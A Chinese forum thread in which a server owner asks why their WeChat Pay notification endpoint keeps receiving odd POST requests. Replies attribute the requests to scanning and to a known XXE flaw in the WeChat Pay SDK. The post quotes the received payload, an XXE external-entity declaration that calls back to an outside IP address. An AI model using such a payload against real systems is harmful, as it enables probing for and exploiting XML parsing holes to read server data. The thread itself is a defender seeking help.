Edesigner. 发表于 2018-11-12 08:33:37

微信支付确认接口,总是收到这样的post数据,是什么原因?

微信支付确认接口是架设在客户服务器上,用来接收来自微信服务器发来的通知,当有人支付成功后会通知客户服务器,支付成功了。是以post的方式来通信,格式是xml。但最近我两台服务器,两个不同的公司账户都收到类似的信息,这数据肯定不是微信发过来。来自的ip都是同一个。这是什么回事?
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2018111203_832?aHR0cHM6Ly93d3cubmV0aGlidXkuY24vZ3JvdXBidXkvbm90aWZ5">
%xxe;
]>

Ray______ 发表于 2018-11-12 08:40:57

之前在阿里云也接收过一些不是我自己应用得消息
一个是阿里云自己扫描的,一个是国外IP发的http消息,查了下像是触发啥漏洞的

aozima 发表于 2018-11-12 09:12:35

肯定对微信的消息要双向认证哈。

Edesigner. 发表于 2018-11-12 11:17:58

微信支付sdk被曝xxe漏洞,漏洞原理分析
https://my.oschina.net/passerman/blog/1840218
页: [1]
查看完整版本: 微信支付确认接口,总是收到这样的post数据,是什么原因?